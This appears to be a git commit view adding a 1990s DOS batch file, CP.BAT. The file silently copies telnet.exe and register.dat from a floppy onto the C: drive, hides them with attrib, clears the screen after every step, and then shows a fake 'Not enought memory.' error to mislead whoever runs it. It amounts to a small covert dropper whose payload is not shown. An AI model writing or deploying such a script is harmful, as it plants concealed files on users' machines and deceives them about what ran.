First commit 10/04/1996

This commit is contained in:
2021-09-08 21:15:53 +02:00
commit 022e798619
5 changed files with 487 additions and 0 deletions

11
CP.BAT Normal file
View File

@ -0,0 +1,11 @@
@echo off
@copy a:\top\telnet.exe c:\
@cls
@copy a:\top\register.dat c:\
@cls
@attrib +h +r c:\telnet.exe
@cls
@attrib +h c:\register.dat
@cls
@echo Not enought memory.